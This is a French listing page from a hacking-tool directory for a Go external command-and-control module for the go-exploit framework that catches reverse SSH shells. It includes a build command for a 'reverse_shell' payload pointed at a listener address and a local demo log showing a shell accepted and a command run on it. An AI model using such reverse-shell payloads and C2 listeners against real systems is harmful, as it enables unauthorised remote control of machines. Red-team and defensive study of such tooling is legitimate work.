Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
external-c2-experiments — Module C2 externe Go pour go-exploit qui capture les shells SSH inversés, fournissant un écouteur serveur et un client de payload pour intégrer des profils C2 personnalisés dans les exploits. | Kitploit
Outils/GitHubGitHub/vulncheck-oss/external-c2-experiments
Frameworks d'ExploitationExploitationPost-ExploitationTests d'IntrusionCommandement et ContrôleUtilitaires et FrameworksRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubvulncheck-oss/external-c2-experiments

external-c2-experiments

Module C2 externe Go pour go-exploit qui capture les shells SSH inversés, fournissant un écouteur serveur et un client de payload pour intégrer des profils C2 personnalisés dans les exploits.

Voir le dépôt
11il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

C2 externe : SSH

Un module C2 externe go-exploit qui prend en charge les shells SSH inversés. Il sert également de démonstration sur la façon d'intégrer des profils C2 externes à vos payloads préférés. L'objectif n'est pas de fournir un payload entièrement weaponisé avec évasion et techniques avancées, mais de montrer comment créer des canaux pour des payloads qui peuvent implémenter des modules d'évasion plus robustes et s'intégrer facilement dans go-exploit.

Structure

  • Le package principal c2ssh qui implémente les interfaces et structures pour mettre en place un serveur destiné à intercepter les payloads SSH
  • ./payload contient l'implémentation des payloads à utiliser par un exploit, il s'agit fonctionnellement du client SSH et d'un fin wrapper autour d'exec basé sur la réponse du serveur
  • ./example contient un test d'auto-exploitation qui exécute un payload d'exemple compilé

Exemple d'utilisation

  1. Compilez le payload pour l'utiliser dans l'exploit afin de le rendre accessible à l'exploit, ceci est actuellement découplé du framework car vous n'utilisez pas toujours des payloads Go :)
  2. Exécutez l'exploit
go build -ldflags "-s -w -X main.Rshost=127.0.0.1 -X main.Rsport=2223" -o reverse_shell
poptart@grimm $ go run example/exploit.go -lhost 127.0.0.1 -lport 2222 -rhost 127.0.0.1 -rport 1337 -e -fll DEBUG -ell DEBUG -t 0
time=2024-08-06T12:09:02.762-06:00 level=DEBUG msg="Using the HTTP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
time=2024-08-06T12:09:02.763-06:00 level=STATUS msg="Starting target" index=0 host=127.0.0.1 port=1337 ssl=false "ssl auto"=false
time=2024-08-06T12:09:02.763-06:00 level=DEBUG msg="External SSH Listener starting: 127.0.0.1:2222"
time=2024-08-06T12:09:02.766-06:00 level=DEBUG msg="SSH: Handshaking for 127.0.0.1:38878"
time=2024-08-06T12:09:02.768-06:00 level=STATUS msg="Active shell SSH: Connection accepted from [email protected]:38878 session: 451e905e22ffbc7ab6235ad73379eeea2c65ba532405d81a431e1c5159ba1179 (SSH-2.0-OpenSSH_9.7)"
id
time=2024-08-06T12:09:04.725-06:00 level=STATUS msg="Running command on SSH client: 'id'"
time=2024-08-06T12:09:08.812-06:00 level=SUCCESS msg="uid=1000(poptart) gid=100(users) groups=100(users),1(wheel),67(libvirtd)\n"
Télécharger l’outil